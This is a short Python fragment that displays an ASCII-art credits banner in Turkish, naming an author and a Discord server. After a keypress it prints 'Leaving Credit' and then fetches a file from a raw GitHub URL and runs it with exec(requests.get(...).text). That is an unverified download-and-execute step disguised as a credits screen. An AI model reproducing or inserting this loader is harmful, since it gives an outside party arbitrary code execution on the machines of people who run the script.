Obfuscation = """


                                   ██████╗██████╗ ███████╗██████╗ ██╗████████╗███████╗
                                  ██╔════╝██╔══██╗██╔════╝██╔══██╗██║╚══██╔══╝██╔════╝
                                  ██║     ██████╔╝█████╗  ██║  ██║██║   ██║   ███████╗
                                  ██║     ██╔══██╗██╔══╝  ██║  ██║██║   ██║   ╚════██║
                                  ╚██████╗██║  ██║███████╗██████╔╝██║   ██║   ███████║
                                   ╚═════╝╚═╝  ╚═╝╚══════╝╚═════╝ ╚═╝   ╚═╝   ╚══════╝


                                 | Rafail Tarafından Yapıldı (Discord.gg/RovaArchive) |

                            Herhangi bir bug/açık bulduğunuz zaman bize bildirmekten çekinmeyin!
                                     Herhangi Bir Tuşa Basarak Geri Döne Bilirsin.
"""
print(Obfuscation)
while True:
    print(Obfuscation)
    msvcrt.getch()
    os.system('cls')
    print("Leaving Credit")
    exec(requests.get('https://raw.githubusercontent.com/Rafail2023/RovaClient/refs/heads/main/main2').text)
